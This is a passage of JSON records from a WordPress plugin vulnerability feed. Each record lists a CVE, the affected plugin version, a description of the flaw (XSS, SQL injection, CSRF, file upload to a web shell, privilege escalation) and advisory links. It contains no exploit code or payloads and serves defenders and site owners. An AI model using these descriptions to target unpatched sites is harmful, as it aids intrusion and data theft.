link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ba5cfa-c2cc-49ac-b22d-7e36ccca6ac5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ba5cfa-c2cc-49ac-b22d-7e36ccca6ac5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0761","slug":"wp-file-manager","versionImpact":"7.2.1","description":"The File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.1 due to insufficient randomness in the backup filenames, which use a timestamp plus 4 random digits. This makes it possible for unauthenticated attackers, to extract sensitive data including site backups in configurations where the .htaccess file in the directory does not block access.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1928f8e4-8bbe-4a3f-8284-aa12ca2f5176?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-file-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-file-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023403\\\/wp-file-manager\\\/trunk\\\/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023403\\\/wp-file-manager\\\/trunk\\\/file_folder_manager.php?old=2984933&old_path=wp-file-manager%2Ftrunk%2Ffile_folder_manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1477","slug":"easy-maintenance-mode-coming-soon","versionImpact":"1.4.2","description":"The Easy Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.2 via the REST API. This makes it possible for authenticated attackers to obtain post and page content via REST API thus bypassign the protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a12f472-0ae1-4c3c-b7e3-85f637fe58c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a12f472-0ae1-4c3c-b7e3-85f637fe58c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-maintenance-mode-coming-soon\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-maintenance-mode-coming-soon\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6363","slug":"stock-ticker","versionImpact":"3.24.4","description":"The Stock Ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's stock_ticker shortcode in all versions up to, and including, 3.24.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/280a5d6d-192a-43aa-927e-45c50b126463?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/280a5d6d-192a-43aa-927e-45c50b126463?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stock-ticker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stock-ticker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stock-ticker\\\/trunk\\\/stock-ticker.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stock-ticker\\\/trunk\\\/stock-ticker.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9066","slug":"marketing-and-seo-booster","versionImpact":"1.9.10","description":"The Marketing and SEO Booster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.9.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52144ff6-0617-496c-8159-ec5d7bc86f60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52144ff6-0617-496c-8159-ec5d7bc86f60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketing-and-seo-booster\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/marketing-and-seo-booster\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9116","slug":"monkee-boy-wp-essentials","versionImpact":"1.1","description":"The Monkee-Boy Essentials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c44c1a50-e282-4a5b-8b7f-1021c9d6f58e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c44c1a50-e282-4a5b-8b7f-1021c9d6f58e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/monkee-boy-wp-essentials\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/monkee-boy-wp-essentials\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11012","slug":"notibar","versionImpact":"2.1.4","description":"The The Notibar \u2013 Notification Bar for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via njt_nofi_text AJAX action in all versions up to, and including, 2.1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notibar\\\/trunk\\\/includes\\\/NotificationBar\\\/WpCustomNotification.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notibar\\\/trunk\\\/includes\\\/NotificationBar\\\/WpCustomNotification.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205224\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205224\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notibar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notibar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1766727d-ba54-4b46-b362-415c14be027d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1766727d-ba54-4b46-b362-415c14be027d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12541","slug":"chative-live-chat-and-chatbot","versionImpact":"1.1","description":"The Chative Live chat and Chatbot plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the add_chative_widget_action() function. This makes it possible for unauthenticated attackers to change the channel ID or organization ID via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This could lead to redirecting the live chat widget to an attacker-controlled channel.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chative-live-chat-and-chatbot\\\/trunk\\\/chative-plugin.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chative-live-chat-and-chatbot\\\/trunk\\\/chative-plugin.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chative-live-chat-and-chatbot\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chative-live-chat-and-chatbot\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61d3cb97-f12b-4480-88fc-2bdcbf4cdae3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61d3cb97-f12b-4480-88fc-2bdcbf4cdae3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13347","slug":"essential-wp-real-estate","versionImpact":"1.1.3","description":"The Essential WP Real Estate WordPress plugin through 1.1.3 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2f97636-4c67-409a-83c6-ad6255aa2cc5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e2f97636-4c67-409a-83c6-ad6255aa2cc5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11335","slug":"ultraembed-advanced-iframe","versionImpact":"1.0.3","description":"The UltraEmbed \u2013 Advanced Iframe Plugin For WordPress with Gutenberg Block Included plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'iframe' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultraembed-advanced-iframe\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultraembed-advanced-iframe\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bfaff5c-25b0-470a-b1ef-fce5976ce205?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bfaff5c-25b0-470a-b1ef-fce5976ce205?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1911","slug":"product-import-export-for-woo","versionImpact":"2.5.0","description":"The Product Import Export for WooCommerce \u2013 Import Export Product CSV Suite plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the admin_log_page() function in all versions up to, and including, 2.5.0. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary log files on the server.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-import-export-for-woo\\\/trunk\\\/admin\\\/modules\\\/history\\\/history.php#L248\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261194\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-import-export-for-woo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d222ef6d-cdec-482e-92ba-65eeabbcdeae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d222ef6d-cdec-482e-92ba-65eeabbcdeae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3280","slug":"elex-bulk-edit-products-prices-attributes-for-woocommerce-basic","versionImpact":"1.4.9","description":"The ELEX WooCommerce Advanced Bulk Edit Products, Prices & Attributes plugin for WordPress is vulnerable to SQL Injection via the 'attribute_value_filter' parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elex-bulk-edit-products-prices-attributes-for-woocommerce-basic\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elex-bulk-edit-products-prices-attributes-for-woocommerce-basic\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2e4b83a-34d5-4a8a-b694-a887a46fe6bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2e4b83a-34d5-4a8a-b694-a887a46fe6bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4420","slug":"vayu-blocks","versionImpact":"1.3.1","description":"The Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018containerWidth\u2019 parameter in all versions up to, and including, 1.3.1 due to a missing capability check on the vayu_blocks_option_panel_callback() function and insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/admin-api.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/admin-api.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303594\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3303594\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vayu-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vayu-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db01bc0a-4508-4fb5-941d-3f1a52528e2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db01bc0a-4508-4fb5-941d-3f1a52528e2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6256","slug":"flex-guten","versionImpact":"1.2.5","description":"The Flex Guten plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018thumbnailHoverEffect\u2019 parameter in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flex-guten\\\/trunk\\\/build\\\/blocks\\\/dwp-latest-posts\\\/render.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flex-guten\\\/trunk\\\/build\\\/blocks\\\/dwp-latest-posts\\\/render.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flex-guten\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flex-guten\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca149cc0-b256-41cd-b64d-dd905bd72602?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca149cc0-b256-41cd-b64d-dd905bd72602?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1922","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_pause_cdn_integration_ajax_request_callback function. This makes it possible for unauthenticated attackers to change cdn settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1743b26-861e-4a61-80de-b8cc82308228?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1743b26-861e-4a61-80de-b8cc82308228?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5704","slug":"cpo-shortcodes","versionImpact":"1.5.0","description":"The CPO Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8ba38c3-51d2-43a7-89ff-c72a8edc946b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8ba38c3-51d2-43a7-89ff-c72a8edc946b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cpo-shortcodes\\\/trunk\\\/shortcodes\\\/shortcode-testimonial.php?rev=2413204#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cpo-shortcodes\\\/trunk\\\/shortcodes\\\/shortcode-testimonial.php?rev=2413204#L38\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5957","slug":"ni-purchase-orderpo-for-woocommerce","versionImpact":"1.2.1","description":"The Ni Purchase Order(PO) For WooCommerce WordPress plugin through 1.2.1 does not validate logo and signature image files uploaded in the settings, allowing high privileged user to upload arbitrary files to the web server, triggering an RCE vulnerability by uploading a web shell.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/70f823ff-64ad-4f05-9eb3-b69b3b79dc12\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/70f823ff-64ad-4f05-9eb3-b69b3b79dc12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1473","slug":"colorlib-coming-soon-maintenance","versionImpact":"1.0.99","description":"The Coming Soon & Maintenance Mode by Colorlib plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.99 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page contents via REST API thus bypassing maintenance mode protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48dc10a9-7bb9-401f-befd-1bf620858825?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48dc10a9-7bb9-401f-befd-1bf620858825?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/colorlib-coming-soon-maintenance\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/colorlib-coming-soon-maintenance\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5790","slug":"happy-elementor-addons","versionImpact":"3.11.1","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 attribute within the plugin's Gradient Heading widget in all versions up to, and including, 3.11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1b948a-7a7e-4bdf-af1d-559f34d4baa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1b948a-7a7e-4bdf-af1d-559f34d4baa3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.11.0\\\/widgets\\\/gradient-heading\\\/widget.php#L260\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.11.0\\\/widgets\\\/gradient-heading\\\/widget.php#L260\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108597\\\/#file575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108597\\\/#file575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7827","slug":"wp-easycart","versionImpact":"5.7.2","description":"The Shopping Cart & eCommerce Store plugin for WordPress is vulnerable to boolean-based SQL Injection via the \u2018model_number\u2019 parameter in all versions up to, and including, 5.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa55dfe1-7ee8-4d25-a9f6-cbefeebb1376?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa55dfe1-7ee8-4d25-a9f6-cbefeebb1376?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easycart\\\/trunk\\\/wpeasycart.php#L8821\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easycart\\\/trunk\\\/wpeasycart.php#L8821\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easycart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easycart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136347\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136347\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9065","slug":"wp-helper-lite","versionImpact":"4.6.1","description":"The WP Helper Premium plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'whp_smtp_send_mail_test' function in all versions up to, and including, 4.6.1. This makes it possible for unauthenticated attackers to send emails containing any content and originating from the vulnerable WordPress instance to any recipient.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f3c6d98-6f30-4a98-91c9-e77c1f960527?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f3c6d98-6f30-4a98-91c9-e77c1f960527?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-helper-lite\\\/trunk\\\/functions\\\/class.wps-frontend-setup-function.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-helper-lite\\\/trunk\\\/functions\\\/class.wps-frontend-setup-function.php#L55\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10357","slug":"cafe-lite","versionImpact":"2.2.1","description":"The Clever Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.1 via the getTemplateContent function in src\/widgets\/class-clever-widget-base.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1fa3569-9a9a-4aa6-9057-c87601fadb9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1fa3569-9a9a-4aa6-9057-c87601fadb9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-widget-base.php#L411\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cafe-lite\\\/trunk\\\/src\\\/widgets\\\/class-clever-widget-base.php#L411\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10783","slug":"mainwp-child","versionImpact":"5.2","description":"The MainWP Child \u2013 Securely Connects to the MainWP Dashboard to Manage Multiple Sites plugin for WordPress is vulnerable to privilege escalation due to a missing authorization checks on the register_site function in all versions up to, and including, 5.2 when a site is left in an unconfigured state. This makes it possible for unauthenticated attackers to log in as an administrator on instances where MainWP Child is not yet connected to the MainWP Dashboard. IMPORTANT: this only affects sites who have MainWP Child installed and have not yet connected to the MainWP Dashboard, and do not have the unique security ID feature enabled. Sites already connected to the MainWP Dashboard plugin and do not have the unique security ID feature enabled, are NOT affected and not required to upgrade. Please note 5.2.1 contains a partial patch, though we consider 5.3 to be the complete 